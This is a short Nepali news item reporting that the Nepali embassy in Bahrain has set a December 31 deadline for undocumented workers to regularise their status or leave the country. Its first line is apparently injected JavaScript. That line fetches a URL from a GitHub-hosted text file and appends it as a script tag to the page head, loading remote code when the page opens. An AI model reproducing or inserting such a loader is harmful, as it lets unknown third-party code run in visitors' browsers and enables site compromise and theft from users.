;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
मंसिर २१,
काठमाडौं । बहाराइनमा रहेका अबैधानिक कामदारहरुलाई बैधानिक हुन वा देश छोड्नको लागि नेपाली दूतावासले आग्रह गरेको छ ।
आइतबार एक सूचना जारी गर्दै मनामास्थित नेपाली दूतावासले विना कागजात काम गरि रहेका कामदाहरुलाई बैधानिक हुन वा देश छाड्नाको लागि आगामी डिसेम्बर ३१ सम्मको समय तोकेको हो । सो समयसम्मा के आबैध रुपमा बस्दै आएकाहरुलाई बैधानिक बन्न आग्रह गरेको छ ।
फेसबुक प्रतिक्रियाहरु